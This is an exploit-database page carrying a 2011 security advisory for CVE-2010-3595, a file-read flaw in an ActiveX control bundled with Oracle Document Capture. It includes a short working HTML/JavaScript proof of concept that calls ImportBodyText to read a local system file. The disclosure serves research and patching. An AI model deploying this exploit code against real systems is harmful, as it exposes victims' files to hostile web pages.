Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtAlexey Sintsov1337DAY-ID-15120
HistoryJan 26, 2011 - 12:00 a.m.

Oracle Document Capture Insecure READ Method

2011-01-2600:00:00
Alexey Sintsov
0day.today
15
JSON

Exploit for windows platform in category remote exploits

Application:                    Oracle Document Capture 
Versions Affected:              10.1350.0005
Vendor URL:                     http://www.oracle.com/technology/software/products/content-management/index_dc.html
Bugs:                           Insecure READ method
Exploits:                       YES
Reported:                       29.01.2010
Second report:                  02.02.2010                   
Date of Public Advisory:        24.01.2010 
CVE:                            CVE-2010-3595
Authors:                        Alexey Sintsov
                                by Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
 
 
 
Description
***********
 
EasyMail ActiveX  Control (emsmtp.dll)  that included into Oracle Document Capture distrib
can be used to read any file in target system. Vulnerable method is "ImportBodyText()".
 
 
 
Details
*******
 
For example if you enter filename "C:\\boot.ini" in "ImportBodyText" method then control will
open and read file "C:\boot.ini". Content of boot.ini will be loaded into property "BodyText" .
 
 
Class EasyMailSMTPObj
GUID: {68AC0D5F-0424-11D5-822F-00C04F6BA8D9}
Number of Interfaces: 1
Default Interface: IEasyMailSMTPObj
RegKey Safe for Script: True
RegKey Safe for Init: True
KillBitSet: False
 
 
 
Example:
*******
 
<HTML>
        <HEAD>
        <TITLE>DSECRG</TITLE>
        </HEAD>
        <BODY>
         
        <OBJECT id='ora' classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9'></OBJECT>
 
        <SCRIPT>
                 
        function Exploit(){
                ora.ImportBodyText("C:\\boot.ini");            
                document.write("Try to read c:\\boot.ini:<br><br>"+ora.BodyText);
        }
        Exploit();
 
        </SCRIPT>
</BODY>
</HTML>
 
 
 
References
**********
 
http://dsecrg.com/pages/vul/show.php?id=307
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html



#  0day.today [2018-03-19]  #

Related

exploitdb 1
securityvulns 2
cve 1
prion 1
cvelist 1
erpscan 1
seebug 1
exploitpack 1
checkpoint_advisories 1
nvd 1
packetstorm 1
nessus 1
oracle 1
exploitdb
exploitdb
Oracle - Document Capture Insecure READ Method
2011-01-26 00:00:00
securityvulns
securityvulns
[DSECRG-11-007] Oracle Document Capture ImportBodyText - read files
2011-01-26 00:00:00
Oracle / Sun / Peoplesoft / Open Office applications multiple security vulnerabilities
2011-02-26 00:00:00
cve
cve
CVE-2010-3595
2011-01-19 16:00:02
prion
prion
Buffer overflow
2011-01-19 16:00:00
cvelist
cvelist
CVE-2010-3595
2011-01-19 15:00:00
erpscan
erpscan
Oracle Document Capture ImportBodyText — read files
2010-01-29 00:00:00
seebug
seebug
Oracle Document Capture Insecure READ Method
2014-07-01 00:00:00
exploitpack
exploitpack
Oracle - Document Capture Insecure READ Method
2011-01-26 00:00:00
checkpoint_advisories
checkpoint_advisories
Oracle Document Capture EasyMail ActiveX Control Information Disclosure (CVE-2010-3595)
2011-02-27 00:00:00
nvd
nvd
CVE-2010-3595
2011-01-19 16:00:02
packetstorm
packetstorm
Oracle Document Capture Insecure READ Method
2011-01-25 00:00:00
nessus
nessus
Oracle Document Capture Multiple Vulnerabilities
2011-02-04 00:00:00
oracle
oracle
Oracle Critical Patch Update - January 2011
2011-01-18 00:00:00
JSON
Related for 1337DAY-ID-15120
exploitdb1securityvulns2cve1prion1cvelist1erpscan1seebug1exploitpack1checkpoint_advisories1nvd1packetstorm1nessus1oracle1